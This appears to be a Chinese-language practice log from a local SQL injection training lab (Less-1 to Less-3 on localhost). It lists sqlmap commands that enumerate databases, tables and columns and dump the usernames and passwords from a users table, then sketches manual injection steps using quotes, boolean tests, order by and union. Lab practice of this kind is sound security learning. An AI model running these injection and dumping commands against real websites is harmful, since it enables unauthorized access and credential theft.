打开搭建好的靶场
运行sqlmap.py
找到自己sqlmap的路径,我这里是C:UsersMachenikeDesktopsqlmap-master
所以打开cmd输入cd C:UsersMachenikeDesktopsqlmap-master
再输入sqlmap.py
输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1
输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 –current-db查下当前数据库
输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security –tables 查看security数据库的表
输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users –columns查看字段
输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users -C password,username –dump 搞到用户和密码
再去尝试了下第二关直接输入python sqlmap.py -u http://127.0.0.1/sql/Less-2/?id=1 -D security -T users -C password,username –dump
自己再去老老实实的手工注入了下
判断了下注入点,直接加单引号了,发现显示了错误 试了下order by 发现查不出
再试了下and 1=1 和 and 1=2 发现 and 1=2 就有变化了,那这次就是整形注入了
再试了下order by 发现查得出
然就我就union了
先直接爆了
然后自己再老老实实去熟练一下
再搞了下第三关发现都没用啊,之前的判断注入,然后看到有括号了,试一试,可以